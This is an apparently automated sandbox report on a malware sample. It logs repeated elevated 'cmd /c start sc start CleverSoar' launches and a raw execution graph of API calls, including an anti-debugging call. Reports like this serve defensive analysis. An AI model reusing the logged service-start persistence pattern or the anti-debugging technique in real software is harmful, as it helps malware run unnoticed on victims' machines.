                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:79
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:80
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:81
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:82
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:83
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:84
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:85
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:86
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:87
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:88
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:89
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:90
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:91
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:92
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:93
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:94
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:95
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:96
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:97
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:98
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:99
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:100
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:101
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:102
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:103
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:104
                                          Start time:03:15:47
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:105
                                          Start time:03:15:48
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:106
                                          Start time:03:15:48
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:107
                                          Start time:03:15:48
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:108
                                          Start time:03:15:48
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:1.6%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:15.2%
                                            Total number of Nodes:834
                                            Total number of Limit Nodes:9
                                            execution_graph 100239 6c61f150 100241 6c61efbe 100239->100241 100240 6c61f243 CreateFileA 100243 6c61f2a7 100240->100243 100241->100240 100242 6c6202ca 100243->100242 100244 6c6202ac GetCurrentProcess TerminateProcess 100243->100244 100244->100242 100245 6c603d62 100248 6c603bc0 100245->100248 100246 6c603e8a GetCurrentThread NtSetInformationThread 100247 6c603eea 100246->100247 100248->100246 100249 6c613b72 100262 6c786a43 100249->100262 100252 6c62639e 100330 6c790130 18 API calls __Getctype 100252->100330 100258 6c6137e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 100258->100252 100276 6c77aec0 100258->100276 100282 6c626ba0 100258->100282 100301 6c626e60 100258->100301 100311 6c627090 100258->100311 100324 6c64e010 100258->100324 100263 6c786a48 100262->100263 100264 6c786a62 100263->100264 100267 6c786a64 std::_Facet_Register 100263->100267 100331 6c78f014 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100263->100331 100264->100258 100266 6c7878c3 std::_Facet_Register 100335 6c789379 RaiseException 100266->100335 100267->100266 100332 6c789379 RaiseException 100267->100332 100269 6c7880bc IsProcessorFeaturePresent 100275 6c7880e1 100269->100275 100271 6c787883 100333 6c789379 RaiseException 100271->100333 100273 6c7878a3 std::invalid_argument::invalid_argument 100334 6c789379 RaiseException 100273->100334 100275->100258 100277 6c77aed6 FindFirstFileA 100276->100277 100278 6c77aed4 100276->100278 100279 6c77af10 100277->100279 100278->100277 100280 6c77af14 FindClose 100279->100280 100281 6c77af72 100279->100281 100280->100279 100281->100258 100283 6c626bd5 100282->100283 100336 6c652020 100283->100336 100285 6c626c68 100286 6c786a43 std::_Facet_Register 4 API calls 100285->100286 100287 6c626ca0 100286->100287 100353 6c787327 100287->100353 100289 6c626cb4 100365 6c651d90 100289->100365 100292 6c626d8e 100292->100258 100294 6c626dc8 100373 6c6526e0 24 API calls 4 library calls 100294->100373 100296 6c626dda 100374 6c789379 RaiseException 100296->100374 100298 6c626def 100299 6c64e010 67 API calls 100298->100299 100300 6c626e0f 100299->100300 100300->100258 100302 6c626e9f 100301->100302 100305 6c626eb3 100302->100305 100769 6c653560 32 API calls std::_Xinvalid_argument 100302->100769 100306 6c626f5b 100305->100306 100771 6c652250 30 API calls 100305->100771 100772 6c6526e0 24 API calls 4 library calls 100305->100772 100773 6c789379 RaiseException 100305->100773 100307 6c626f6e 100306->100307 100770 6c6537e0 32 API calls std::_Xinvalid_argument 100306->100770 100307->100258 100312 6c62709e 100311->100312 100316 6c6270d1 100311->100316 100774 6c6501f0 100312->100774 100314 6c627183 100314->100258 100316->100314 100778 6c652250 30 API calls 100316->100778 100318 6c790b18 67 API calls 100318->100316 100319 6c6271ae 100779 6c652340 24 API calls 100319->100779 100321 6c6271be 100780 6c789379 RaiseException 100321->100780 100323 6c6271c9 100325 6c64e04b 100324->100325 100326 6c64e0a3 100325->100326 100327 6c6501f0 64 API calls 100325->100327 100326->100258 100328 6c64e098 100327->100328 100329 6c790b18 67 API calls 100328->100329 100329->100326 100331->100263 100332->100271 100333->100273 100334->100266 100335->100269 100337 6c786a43 std::_Facet_Register 4 API calls 100336->100337 100338 6c65207e 100337->100338 100339 6c787327 43 API calls 100338->100339 100340 6c652092 100339->100340 100375 6c652f60 42 API calls 4 library calls 100340->100375 100342 6c6520c8 100343 6c652136 100342->100343 100345 6c65210d 100342->100345 100377 6c652250 30 API calls 100343->100377 100344 6c652120 100344->100285 100345->100344 100376 6c786f8e 9 API calls 2 library calls 100345->100376 100348 6c65215b 100378 6c652340 24 API calls 100348->100378 100350 6c652171 100379 6c789379 RaiseException 100350->100379 100352 6c65217c 100352->100285 100354 6c787333 __EH_prolog3 100353->100354 100380 6c786eb5 100354->100380 100359 6c787351 100394 6c7873ba 39 API calls std::locale::_Setgloballocale 100359->100394 100361 6c7873ac 100361->100289 100362 6c787359 100395 6c7871b1 HeapFree GetLastError _Yarn 100362->100395 100364 6c78736f 100386 6c786ee6 100364->100386 100366 6c626d5d 100365->100366 100367 6c651ddc 100365->100367 100366->100292 100372 6c652250 30 API calls 100366->100372 100400 6c787447 100367->100400 100371 6c651e82 100372->100294 100373->100296 100374->100298 100375->100342 100376->100344 100377->100348 100378->100350 100379->100352 100381 6c786ecb 100380->100381 100382 6c786ec4 100380->100382 100384 6c786ec9 100381->100384 100397 6c78858b EnterCriticalSection 100381->100397 100396 6c7903cd 6 API calls std::_Lockit::_Lockit 100382->100396 100384->100364 100393 6c787230 6 API calls 2 library calls 100384->100393 100387 6c7903db 100386->100387 100388 6c786ef0 100386->100388 100399 6c7903b6 LeaveCriticalSection 100387->100399 100389 6c786f03 100388->100389 100398 6c788599 LeaveCriticalSection 100388->100398 100389->100361 100392 6c7903e2 100392->100361 100393->100359 100394->100362 100395->100364 100396->100384 100397->100384 100398->100389 100399->100392 100401 6c787450 100400->100401 100404 6c651dea 100401->100404 100409 6c78fd4a 100401->100409 100403 6c78749c 100403->100404 100420 6c78fa58 65 API calls 100403->100420 100404->100366 100408 6c78c563 18 API calls __Getctype 100404->100408 100406 6c7874b7 100406->100404 100421 6c790b18 100406->100421 100408->100371 100410 6c78fd55 __wsopen_s 100409->100410 100411 6c78fd68 100410->100411 100412 6c78fd88 100410->100412 100446 6c790120 18 API calls __Getctype 100411->100446 100416 6c78fd78 100412->100416 100432 6c79ae0c 100412->100432 100416->100403 100420->100406 100422 6c790b24 __wsopen_s 100421->100422 100423 6c790b2e 100422->100423 100424 6c790b43 100422->100424 100642 6c790120 18 API calls __Getctype 100423->100642 100425 6c790b3e 100424->100425 100627 6c78c5a9 EnterCriticalSection 100424->100627 100425->100404 100427 6c790b60 100628 6c790b9c 100427->100628 100430 6c790b6b 100643 6c790b92 LeaveCriticalSection 100430->100643 100433 6c79ae18 __wsopen_s 100432->100433 100448 6c79039f EnterCriticalSection 100433->100448 100435 6c79ae26 100449 6c79aeb0 100435->100449 100440 6c79af72 100441 6c79b091 100440->100441 100473 6c79b114 100441->100473 100444 6c78fdcc 100447 6c78fdf5 LeaveCriticalSection 100444->100447 100446->100416 100447->100416 100448->100435 100450 6c79aed3 100449->100450 100451 6c79af2b 100450->100451 100458 6c79ae33 100450->100458 100466 6c78c5a9 EnterCriticalSection 100450->100466 100467 6c78c5bd LeaveCriticalSection 100450->100467 100468 6c7971e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100451->100468 100453 6c79af34 100469 6c7947bb HeapFree GetLastError __dosmaperr 100453->100469 100456 6c79af3d 100456->100458 100470 6c796c1f 6 API calls std::_Lockit::_Lockit 100456->100470 100463 6c79ae6c 100458->100463 100459 6c79af5c 100471 6c78c5a9 EnterCriticalSection 100459->100471 100462 6c79af6f 100462->100458 100472 6c7903b6 LeaveCriticalSection 100463->100472 100465 6c78fda3 100465->100416 100465->100440 100466->100450 100467->100450 100468->100453 100469->100456 100470->100459 100471->100462 100472->100465 100474 6c79b133 100473->100474 100475 6c79b146 100474->100475 100479 6c79b15b 100474->100479 100489 6c790120 18 API calls __Getctype 100475->100489 100477 6c79b0a7 100477->100444 100486 6c7a3fde 100477->100486 100484 6c79b27b 100479->100484 100490 6c7a3ea8 37 API calls __Getctype 100479->100490 100481 6c79b2cb 100481->100484 100491 6c7a3ea8 37 API calls __Getctype 100481->100491 100483 6c79b2e9 100483->100484 100492 6c7a3ea8 37 API calls __Getctype 100483->100492 100484->100477 100493 6c790120 18 API calls __Getctype 100484->100493 100494 6c7a4396 100486->100494 100489->100477 100490->100481 100491->100483 100492->100484 100493->100477 100496 6c7a43a2 __wsopen_s 100494->100496 100495 6c7a43a9 100512 6c790120 18 API calls __Getctype 100495->100512 100496->100495 100497 6c7a43d4 100496->100497 100503 6c7a3ffe 100497->100503 100501 6c7a3ff9 100501->100444 100514 6c7906cb 100503->100514 100508 6c7a4034 100510 6c7a4066 100508->100510 100554 6c7947bb HeapFree GetLastError __dosmaperr 100508->100554 100513 6c7a442b LeaveCriticalSection __wsopen_s 100510->100513 100512->100501 100513->100501 100555 6c78bceb 100514->100555 100518 6c7906ef 100519 6c78bdf6 100518->100519 100564 6c78be4e 100519->100564 100521 6c78be0e 100521->100508 100522 6c7a406c 100521->100522 100579 6c7a44ec 100522->100579 100528 6c7a4192 GetFileType 100531 6c7a419d GetLastError 100528->100531 100532 6c7a41e4 100528->100532 100529 6c7a409e __dosmaperr 100529->100508 100530 6c7a4167 GetLastError 100530->100529 100608 6c78f9f2 __dosmaperr 100531->100608 100609 6c7a17b0 SetStdHandle __dosmaperr __wsopen_s 100532->100609 100533 6c7a4115 100533->100528 100533->100530 100607 6c7a4457 CreateFileW 100533->100607 100536 6c7a41ab CloseHandle 100536->100529 100550 6c7a41d4 100536->100550 100538 6c7a415a 100538->100528 100538->100530 100539 6c7a4205 100540 6c7a4251 100539->100540 100610 6c7a4666 70 API calls 2 library calls 100539->100610 100544 6c7a4258 100540->100544 100624 6c7a4710 70 API calls 2 library calls 100540->100624 100543 6c7a4286 100543->100544 100545 6c7a4294 100543->100545 100611 6c79b925 100544->100611 100545->100529 100547 6c7a4310 CloseHandle 100545->100547 100625 6c7a4457 CreateFileW 100547->100625 100549 6c7a433b 100549->100550 100551 6c7a4345 GetLastError 100549->100551 100550->100529 100552 6c7a4351 __dosmaperr 100551->100552 100626 6c7a171f SetStdHandle __dosmaperr __wsopen_s 100552->100626 100554->100510 100556 6c78bd0b 100555->100556 100562 6c78bd02 100555->100562 100557 6c7949b2 __Getctype 37 API calls 100556->100557 100556->100562 100558 6c78bd2b 100557->100558 100559 6c794f28 __Getctype 37 API calls 100558->100559 100560 6c78bd41 100559->100560 100561 6c794f55 __fassign 37 API calls 100560->100561 100561->100562 100562->100518 100563 6c7969d5 5 API calls std::_Lockit::_Lockit 100562->100563 100563->100518 100565 6c78be5c 100564->100565 100566 6c78be76 100564->100566 100567 6c78bddc __wsopen_s HeapFree GetLastError 100565->100567 100568 6c78be9c 100566->100568 100569 6c78be7d 100566->100569 100578 6c78be66 __dosmaperr 100567->100578 100570 6c794843 __fassign MultiByteToWideChar 100568->100570 100571 6c78bd9d __wsopen_s HeapFree GetLastError 100569->100571 100569->100578 100572 6c78beab 100570->100572 100571->100578 100573 6c78beb2 GetLastError 100572->100573 100574 6c78bed8 100572->100574 100575 6c78bd9d __wsopen_s HeapFree GetLastError 100572->100575 100573->100578 100576 6c794843 __fassign MultiByteToWideChar 100574->100576 100574->100578 100575->100574 100577 6c78beef 100576->100577 100577->100573 100577->100578 100578->100521 100580 6c7a4527 100579->100580 100582 6c7a450d 100579->100582 100581 6c7a447c __wsopen_s 18 API calls 100580->100581 100586 6c7a455f 100581->100586 100582->100580 100583 6c790120 __Getctype 18 API calls 100582->100583 100583->100580 100584 6c7a458e 100585 6c7a5911 __wsopen_s 18 API calls 100584->100585 100591 6c7a4089 100584->100591 100587 6c7a45dc 100585->100587 100586->100584 100589 6c790120 __Getctype 18 API calls 100586->100589 100588 6c7a4659 100587->100588 100587->100591 100590 6c79014d __Getctype 11 API calls 100588->100590 100589->100584 100592 6c7a4665 100590->100592 100591->100529 100593 6c7a160c 100591->100593 100594 6c7a1618 __wsopen_s 100593->100594 100595 6c79039f std::_Lockit::_Lockit EnterCriticalSection 100594->100595 100596 6c7a161f 100595->100596 100597 6c7a1644 100596->100597 100602 6c7a16b3 EnterCriticalSection 100596->100602 100605 6c7a1666 100596->100605 100599 6c7a1842 __wsopen_s 11 API calls 100597->100599 100598 6c7a1716 __wsopen_s LeaveCriticalSection 100600 6c7a1686 100598->100600 100601 6c7a1649 100599->100601 100600->100529 100606 6c7a4457 CreateFileW 100600->100606 100604 6c7a1990 __wsopen_s EnterCriticalSection 100601->100604 100601->100605 100603 6c7a16c0 LeaveCriticalSection 100602->100603 100602->100605 100603->100596 100604->100605 100605->100598 100606->100533 100607->100538 100608->100536 100609->100539 100610->100540 100612 6c7a15a2 __wsopen_s 18 API calls 100611->100612 100615 6c79b935 100612->100615 100613 6c79b93b 100614 6c7a171f __wsopen_s SetStdHandle 100613->100614 100623 6c79b993 __dosmaperr 100614->100623 100615->100613 100616 6c7a15a2 __wsopen_s 18 API calls 100615->100616 100622 6c79b96d 100615->100622 100618 6c79b964 100616->100618 100617 6c7a15a2 __wsopen_s 18 API calls 100619 6c79b979 CloseHandle 100617->100619 100620 6c7a15a2 __wsopen_s 18 API calls 100618->100620 100619->100613 100621 6c79b985 GetLastError 100619->100621 100620->100622 100621->100613 100622->100613 100622->100617 100623->100529 100624->100543 100625->100549 100626->100550 100627->100427 100629 6c790ba9 100628->100629 100630 6c790bbe 100628->100630 100666 6c790120 18 API calls __Getctype 100629->100666 100634 6c790bb9 100630->100634 100644 6c790cb9 100630->100644 100634->100430 100638 6c790be1 100659 6c79b898 100638->100659 100640 6c790be7 100640->100634 100667 6c7947bb HeapFree GetLastError __dosmaperr 100640->100667 100642->100425 100643->100425 100645 6c790cd1 100644->100645 100649 6c790bd3 100644->100649 100646 6c799c60 18 API calls 100645->100646 100645->100649 100647 6c790cef 100646->100647 100668 6c79bb6c 100647->100668 100650 6c79873e 100649->100650 100651 6c790bdb 100650->100651 100652 6c798755 100650->100652 100654 6c799c60 100651->100654 100652->100651 100756 6c7947bb HeapFree GetLastError __dosmaperr 100652->100756 100655 6c799c6c 100654->100655 100656 6c799c81 100654->100656 100757 6c790120 18 API calls __Getctype 100655->100757 100656->100638 100658 6c799c7c 100658->100638 100660 6c79b8be 100659->100660 100664 6c79b8a9 __dosmaperr 100659->100664 100661 6c79b8e5 100660->100661 100663 6c79b907 __dosmaperr 100660->100663 100758 6c79b9c1 100661->100758 100766 6c790120 18 API calls __Getctype 100663->100766 100664->100640 100666->100634 100667->100634 100669 6c79bb78 __wsopen_s 100668->100669 100670 6c79bbca 100669->100670 100672 6c79bc33 __dosmaperr 100669->100672 100675 6c79bb80 __dosmaperr 100669->100675 100679 6c7a1990 EnterCriticalSection 100670->100679 100709 6c790120 18 API calls __Getctype 100672->100709 100673 6c79bbd0 100677 6c79bbec __dosmaperr 100673->100677 100680 6c79bc5e 100673->100680 100675->100649 100708 6c79bc2b LeaveCriticalSection __wsopen_s 100677->100708 100679->100673 100681 6c79bc80 100680->100681 100707 6c79bc9c __dosmaperr 100680->100707 100682 6c79bcd4 100681->100682 100683 6c79bc84 __dosmaperr 100681->100683 100684 6c79bce7 100682->100684 100718 6c79ac69 20 API calls __wsopen_s 100682->100718 100717 6c790120 18 API calls __Getctype 100683->100717 100710 6c79be40 100684->100710 100689 6c79bcfd 100691 6c79bd01 100689->100691 100692 6c79bd26 100689->100692 100690 6c79bd3c 100693 6c79bd50 100690->100693 100694 6c79bd95 WriteFile 100690->100694 100691->100707 100719 6c79c25b 6 API calls __wsopen_s 100691->100719 100720 6c79beb1 43 API calls 5 library calls 100692->100720 100697 6c79bd5b 100693->100697 100698 6c79bd85 100693->100698 100696 6c79bdb9 GetLastError 100694->100696 100694->100707 100696->100707 100701 6c79bd60 100697->100701 100702 6c79bd75 100697->100702 100723 6c79c2c3 7 API calls 2 library calls 100698->100723 100705 6c79bd65 100701->100705 100701->100707 100722 6c79c487 8 API calls 3 library calls 100702->100722 100704 6c79bd73 100704->100707 100721 6c79c39e 7 API calls 2 library calls 100705->100721 100707->100677 100708->100675 100709->100675 100724 6c7a19e5 100710->100724 100712 6c79be51 100713 6c79bcf8 100712->100713 100729 6c7949b2 GetLastError 100712->100729 100713->100689 100713->100690 100716 6c79be8e GetConsoleMode 100716->100713 100717->100707 100718->100684 100719->100707 100720->100707 100721->100704 100722->100704 100723->100704 100726 6c7a19f2 100724->100726 100727 6c7a19ff 100724->100727 100725 6c7a1a0b 100725->100712 100726->100712 100727->100725 100728 6c790120 __Getctype 18 API calls 100727->100728 100728->100726 100730 6c7949c9 100729->100730 100731 6c7949cf 100729->100731 100732 6c796b23 __Getctype 6 API calls 100730->100732 100733 6c796b62 __Getctype 6 API calls 100731->100733 100735 6c7949d5 SetLastError 100731->100735 